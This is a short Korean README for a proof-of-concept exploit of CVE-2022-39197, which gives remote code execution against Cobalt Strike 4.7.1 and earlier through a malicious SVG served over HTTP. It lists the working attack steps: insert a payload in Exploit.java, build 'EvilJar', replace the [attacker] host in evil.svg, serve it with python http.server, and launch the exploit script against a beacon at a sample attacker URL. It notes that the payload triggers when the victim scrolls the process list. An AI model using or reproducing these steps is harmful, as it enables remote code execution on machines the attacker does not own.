
CVE-2022-39197에 대한 개념 증명 익스플로잇으로, HTTP를 통해 제공되는 악성 SVG 페이로드를 이용해 CobaltStrike <= 4.7.1에 대한 원격 코드 실행을 가능하게 합니다.
EvilJar/src/main/java/Exploit.java에서 Line 19를 페이로드로 수정하세요.mvn clean compile assembly:singleEvilJar/target/에서 serve/ 폴더로 EvilJar-1.0-jar-with-dependencies.jar를 이동하세요.serve\evil.svg를 편집하여 [attacker]를 대체하세요.python3 -m http.server 8080python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
페이로드는 사용자가 프로세스 목록을 스크롤하는 즉시 트리거됩니다.

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — 이 취약점에 대한 훌륭한 심층 분석이 있습니다. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html